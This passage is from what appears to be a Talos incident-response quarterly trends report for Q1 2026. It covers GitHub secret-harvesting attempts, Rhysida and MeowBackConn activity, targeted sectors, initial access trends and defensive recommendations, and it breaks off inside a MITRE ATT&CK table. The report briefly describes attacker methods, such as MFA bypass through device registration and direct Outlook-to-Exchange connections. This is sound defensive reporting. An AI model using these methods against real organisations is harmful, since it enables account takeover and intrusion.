platform functionality to blend into normal user activity, making detection more challenging.&#xA0;</p><p>In addition to exfiltrating data, the adversary&#xA0;attempted&#xA0;to inject malicious code into multiple GitHub repositories. This code was designed to harvest any new secrets committed in the future, sending them to adversary-controlled infrastructure. Though these attempts were&#xA0;largely thwarted&#xA0;by the&#xA0;expiration&#xA0;of targeted secrets and effective security controls, the tactic reflects an emerging trend of supply chain and development environment attacks.&#xA0;&#xA0;</p><h2 id="ransomware-trends">Ransomware trends&#xA0;</h2><h3 id="ransomware-experiences-slight-increase-remains-low-overall">Ransomware experiences slight increase,&#xA0;remains&#xA0;low overall&#xA0;&#xA0;</h3><p>Pre-ransomware incidents made up just 18 percent of engagements this quarter, and we did not&#xA0;observe&#xA0;any ransomware&#xA0;encryption&#xA0;due to early and swift mitigation from Talos IR. This is a slight increase from last quarter, when ransomware and pre-ransomware collectively&#xA0;comprised&#xA0;13 percent of engagements, but&#xA0;overall&#xA0;very low&#xA0;compared to Q1 and Q2 2025, when we&#xA0;observed&#xA0;ransomware in 50 percent of engagements. Attribution is challenging in pre-ransomware events&#xA0;because&#xA0;there are no encryptors or ransom notes, but we assess that&#xA0;Rhysida&#xA0;ransomware and&#xA0;MoneyMessage&#xA0;ransomware accounted for two of the engagements.&#xA0;</p><p>While we did not&#xA0;observe&#xA0;many active and prolific ransomware-as-a-service (RaaS) operations, like&#xA0;Qilin&#xA0;or Akira, this&#xA0;likely does&#xA0;not&#xA0;indicate&#xA0;these major players are decreasing operations, as their data leak sites&#xA0;remain&#xA0;consistently active.&#xA0;&#xA0;&#xA0;&#xA0;</p><h3 id="rhysida-ransomware-actors-use-uncommon-backdoor-meowbackconn">Rhysida&#xA0;ransomware actors use&#xA0;uncommon backdoor,&#xA0;Meowbackconn&#xA0;&#xA0;</h3><p>Talos&#xA0;IR&#xA0;responded to a ransomware incident where the adversary&#xA0;attempted&#xA0;to deploy&#xA0;Rhysida&#xA0;ransomware. While the attack was mitigated in the pre-ransomware stage, we attribute this activity with moderate confidence to&#xA0;Rhysidabased on observed infrastructure that is associated with&#xA0;Rhysida&#xA0;activity and the use of&#xA0;Gootloader, which is commonly&#xA0;leveraged&#xA0;in&#xA0;Rhysida&#xA0;attacks during&#xA0;initial&#xA0;access.&#xA0;Notably, the actors deployed proxy-related DLLs (e.g.,&#xA0;&#x201C;meow_eu.dll&#x201D;), which we assess were&#xA0;likely related&#xA0;to&#xA0;MeowBackConn, an uncommon backdoor that is&#xA0;closely associated&#xA0;with&#xA0;Gootloader, based on public reporting.&#xA0;</p><p>This attack&#xA0;represents&#xA0;several trends that we&#xA0;observed&#xA0;throughout Talos IR engagements in Q1 2026.&#xA0;The environmental weaknesses that enabled this intrusion &#x2014; exposed&#xA0;WinRM&#xA0;management ports, over-privileged service accounts, and critical logging gaps &#x2014; directly echo this quarter&#x2019;s most prominent security weaknesses, including vulnerable or exposed infrastructure, accounting for 25 percent of engagements. Furthermore, the adversary&#x2019;s use of&#xA0;Remote Desktop Protocol (RDP)&#xA0;for lateral movement is consistent with RDP being the top technique for lateral movement for the previous two quarters (Q3 and Q4 2025).</p><h3 id="targeting">Targeting</h3><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Q1dark_Q4Targets-dark-1-.jpg" class="kg-image" alt="IR Trends Q1 2026: Phishing reemerges as top initial access vector, as attacks targeting public administration persist" loading="lazy" width="2000" height="777" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Q1dark_Q4Targets-dark-1-.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Q1dark_Q4Targets-dark-1-.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Q1dark_Q4Targets-dark-1-.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/04/Q1dark_Q4Targets-dark-1-.jpg 2400w" sizes="(min-width: 720px) 720px"></figure><p>Public administration and health&#xA0;care were tied as the most targeted industry verticals. Notably, Q3 2025 marked the first time public administration&#xA0;emerged&#xA0;as the most targeted sector in Talos IR engagements, and it has&#xA0;retained&#xA0;that position since.&#xA0;Organizations within the public administration sector are attractive targets as they are often underfunded and use legacy equipment. These entities may have access to sensitive data as well as a low downtime tolerance, making them attractive to financially motivated and espionage-focused threat groups.</p><h3 id="initial-access">Initial access</h3><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Q1dark_Q4InfectionVectors-dark.jpg" class="kg-image" alt="IR Trends Q1 2026: Phishing reemerges as top initial access vector, as attacks targeting public administration persist" loading="lazy" width="1875" height="712" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Q1dark_Q4InfectionVectors-dark.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Q1dark_Q4InfectionVectors-dark.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Q1dark_Q4InfectionVectors-dark.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Q1dark_Q4InfectionVectors-dark.jpg 1875w" sizes="(min-width: 720px) 720px"></figure><p>Phishing reemerged as the most observed means of gaining initial access, accounting for over a third of the engagements where&#xA0;initial&#xA0;access could be&#xA0;determined. Phishing was the top&#xA0;initial&#xA0;access vector in the first half of 2025, at which point it was surpassed by exploitation of public-facing applications,&#xA0;likely due to&#xA0;the widespread exploitation of vulnerabilities in on-premises Microsoft SharePoint servers, collectively referred to as&#xA0;ToolShell. Since then, we have&#xA0;observeda steady decrease in the exploitation of public-facing applications as&#xA0;an initial&#xA0;access vector from a high of 62 percent to only 18 percent in Q1 2026. Similarly, in this quarter, valid accounts returned to its pre-ToolShell&#xA0;baseline as the second most&#xA0;observed&#xA0;means of gaining initial access,&#xA0;comprising&#xA0;24 percent of Talos IR engagements. We assess the decline in&#xA0;ToolShell&#xA0;exploitation&#xA0;is&#xA0;likely due to the widespread availability of emergency patches and enhanced security detections, highlighting the importance of&#xA0;timely&#xA0;patching.</p><h2 id="recommendations-for-addressing-top-security-weaknesses">Recommendations for addressing top security weaknesses</h2><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Q1dark_Q4SecurityWeakness-dark.jpg" class="kg-image" alt="IR Trends Q1 2026: Phishing reemerges as top initial access vector, as attacks targeting public administration persist" loading="lazy" width="1875" height="711" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Q1dark_Q4SecurityWeakness-dark.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Q1dark_Q4SecurityWeakness-dark.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Q1dark_Q4SecurityWeakness-dark.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Q1dark_Q4SecurityWeakness-dark.jpg 1875w" sizes="(min-width: 720px) 720px"></figure><h3 id="implement-properly-configured-mfa-and-other-access-control-solutions">Implement properly configured MFA and other access control solutions&#xA0;&#xA0;</h3><p>35 percent of engagements this quarter involved&#xA0;multi-factor authentication (MFA)&#xA0;weaknesses, an increase from last quarter. This includes incidents where threat actors bypassed MFA and where MFA was either missing or only partially enabled, particularly on remote access services. Adversaries were able to bypass MFA by registering new devices to previously compromised accounts, and in one instance, by configuring Outlook clients to connect directly to Exchange servers, circumventing MFA requirements. Addressing these weaknesses, especially by restricting self-service MFA enrollment and enforcing strong, centralized authentication policies, is essential to reducing risk and strengthening organizational resilience.&#xA0;</p><h3 id="conduct-robust-patch-management">Conduct robust patch management&#xA0;&#xA0;&#xA0;</h3><p>Vulnerable or exposed infrastructure was another top security weakness accounting for 25 percent of all engagements, a slight decrease from last quarter. This included exploiting a vulnerability (CVE-2025-20393) in the Spam Quarantine feature of Cisco&#xA0;AsyncOS&#xA0;Software for Cisco Secure Email Gateway and Cisco Secure Email and Web Manager, as well as&#xA0;a&#xA0;vulnerability (CVE-2023-20198) in the web UI feature in Cisco IOS XE Software.&#xA0;Talos&#xA0;also&#xA0;observed&#xA0;exposed management ports (such as&#xA0;WinRM&#xA0;open to the internet), which enabled rapid attacker movement and reconnaissance.&#xA0;&#xA0;</p><h3 id="configure-centralized-logging-capabilities-across-the-environment">Configure centralized logging capabilities across the environment&#xA0;&#xA0;&#xA0;</h3><p>Finally, 18 percent of engagements this quarter involved organizations with insufficient logging capabilities, which&#xA0;hindered investigative efforts. Understanding the full context and chain of events performed by an adversary on a targeted host is vital not only for remediation but also for enhancing defenses and addressing any system vulnerabilities for the future. To address this issue, Talos IR recommends organizations implement a&#xA0;security&#xA0;information and&#xA0;event&#xA0;management (SIEM) solution for centralized logging. In the event an adversary&#xA0;deletes&#xA0;or modifies logs on the host, the SIEM will&#xA0;contain&#xA0;the original logs to support a forensics investigation.&#xA0;Additionally,&#xA0;Talos IR&#xA0;offers&#xA0;a&#xA0;<a href="https://talosintelligence.com/incident_response/assessment" rel="noreferrer noopener"><u>Log Architecture Assessment</u></a>&#xA0;service, which&#xA0;provides a focused review of an organization&#x2019;s logs and overall log strategy to&#xA0;identify&#xA0;gaps&#xA0;and&#xA0;offer recommendations that give a complete view of the security environment and strengthen incident response readiness&#xA0;</p><h2 id="mitre-attck-appendix">MITRE ATT&amp;CK appendix&#xA0;</h2><p>The tables&#xA0;below&#xA0;represent&#xA0;the MITRE ATT&amp;CK techniques&#xA0;observed&#xA0;in this quarter&#x2019;s IR engagements and&#xA0;includes&#xA0;relevant examples and the number of times seen. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic based on the way they were&#xA0;leveraged. Please note&#xA0;that&#xA0;this is not an exhaustive list.&#xA0;</p><p>Key findings from the MITRE ATT&amp;CK framework include:&#xA0;</p><ul><li>Phishing was the top method of&#xA0;initial&#xA0;access, replacing exploitation of public-facing applications which was dominant in the prior two quarters.&#xA0;</li><li>Web-based&#xA0;C2&#xA0;was the most common C2 pattern. Application Layer Protocol over web protocols was&#xA0;observed&#xA0;most often,&#xA0;indicating&#xA0;adversaries&#xA0;frequently&#xA0;blended C2 into normal-looking traffic.&#xA0;</li><li>Lateral movement primarily relied on common remote administration channels. SMB/Windows Admin Shares was the top lateral movement technique, with WMI and RDP also heavily used, suggesting attackers repeatedly&#xA0;leveragedstandard enterprise remote management paths once inside. RDP was the top technique for lateral movement in the prior two quarters.&#xA0;&#xA0;</li><li>Defense evasion&#xA0;frequently&#xA0;focused on weakening visibility and endpoint protections. Impair defenses by disabling/modifying&#xA0;tools appeared multiple times, alongside log/trace reduction behaviors (e.g., clear command history and file deletion),&#xA0;indicating&#xA0;a recurring emphasis on reducing detection and forensic evidence.</li></ul>
<!--kg-card-begin: html-->
<table class="Table Ltr TableWordWrap SCXW67619765 BCX4" border="1" dir="ltr" data-tablestyle="MsoTableGrid" data-tablelook="0" aria-rowcount="49" style="font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-line: none; text-decoration-thickness: auto; text-decoration-style: solid; -webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; table-layout: fixed; width: 1px; border-collapse: collapse; empty-cells: show; position: relative; overflow: visible; caret-color: rgba(0, 0, 0, 0.847); color: rgba(0, 0, 0, 0.847); font-family: &quot;Segoe UI&quot;, &quot;Segoe UI Web&quot;, Arial, Verdana, sans-serif; font-size: 12px; background: none; border-spacing: 0px;"><tbody class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text;"><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="1" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstRow FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="14432388" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{168}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" data-ccp-parastyle-defn="{&quot;ObjectId&quot;:&quot;bc8d283f-51d9-50bc-8589-5a201f143310|1&quot;,&quot;ClassId&quot;:1073872969,&quot;Properties&quot;:[201342446,&quot;1&quot;,201342447,&quot;5&quot;,201342448,&quot;3&quot;,201342449,&quot;1&quot;,469777841,&quot;CiscoSansTT&quot;,469777842,&quot;Arial&quot;,469777843,&quot;&#xFF2D;&#xFF33; &#x660E;&#x671D;&quot;,469777844,&quot;CiscoSansTT&quot;,201341986,&quot;1&quot;,469769226,&quot;CiscoSansTT&quot;,268442635,&quot;20&quot;,469775450,&quot;Table Header&quot;,201340122,&quot;2&quot;,134234082,&quot;true&quot;,134233614,&quot;true&quot;,469778129,&quot;TableHeader&quot;,335572020,&quot;1&quot;,134224900,&quot;true&quot;,335551500,&quot;16777215&quot;,335559738,&quot;288&quot;,469775498,&quot;Table Body&quot;,469778324,&quot;Normal&quot;]}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Tactic</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="FirstRow SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1043741759" paraeid="{a9a68ea3-c81b-4b6a-99aa-871d128d7233}{243}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Technique</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559737&quot;:0,&quot;335559738&quot;:288,&quot;335559739&quot;:0,&quot;335559740&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="FirstRow SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="600024864" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{171}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Example</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="FirstRow LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="728990158" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{178}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Estimated times observed&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="2" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1134762312" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{172}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" data-ccp-parastyle-defn="{&quot;ObjectId&quot;:&quot;687983a9-1aa9-55f0-9007-1526daa5aaeb|1&quot;,&quot;ClassId&quot;:1073872969,&quot;Properties&quot;:[201342446,&quot;1&quot;,201342447,&quot;5&quot;,201342448,&quot;3&quot;,201342449,&quot;1&quot;,469777841,&quot;CiscoSansTT Light&quot;,469777842,&quot;Arial&quot;,469777843,&quot;&#xFF2D;&#xFF33; &#x660E;&#x671D;&quot;,469777844,&quot;CiscoSansTT Light&quot;,201341986,&quot;1&quot;,469769226,&quot;CiscoSansTT Light&quot;,268442635,&quot;20&quot;,469775450,&quot;Table Body&quot;,201340122,&quot;2&quot;,134234082,&quot;true&quot;,134233614,&quot;true&quot;,469778129,&quot;TableBody&quot;,335572020,&quot;1&quot;,134234072,&quot;true&quot;,335559740,&quot;276&quot;,201341983,&quot;0&quot;,335559739,&quot;120&quot;,335559738,&quot;120&quot;,335551550,&quot;6&quot;,335551620,&quot;6&quot;,469778324,&quot;Normal&quot;]}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Reconnaissance</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1190228782" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{186}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1589.002: Gather Victim Identity Information: Email Addresses</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1076700468" paraeid="{6df0c8d5-ced1-41b8-82d4-3fb270aacd2b}{193}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">enumerated</span><span class="NormalTextRun 